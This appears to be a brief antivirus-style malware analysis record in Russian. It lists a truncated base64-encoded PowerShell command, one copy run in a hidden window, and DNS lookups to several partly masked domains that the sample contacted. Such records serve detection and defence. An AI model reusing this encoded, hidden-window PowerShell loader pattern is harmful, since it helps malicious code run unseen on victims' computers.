Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAANgA1AGMAMAA0ADAAYgA2ADUAMAA9ACcAYwAwADQANwA5AGIAYwAzADUAOAA4ADUAMAAnADsAJABiADUANwA4ADAAMQA...
- DNS ASK bi####atrading.com
- DNS ASK op####terswimli.com
- DNS ASK at####and.home.pl
- DNS ASK kd###signs.ca
- DNS ASK ea###report.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAANgA1AGMAMAA0ADAAYgA2ADUAMAA9ACcAYwAwADQANwA5AGIAYwAzADUAOAA4ADUAMAAnADsAJABiADUANwA4ADAAMQA...' (со скрытым окном)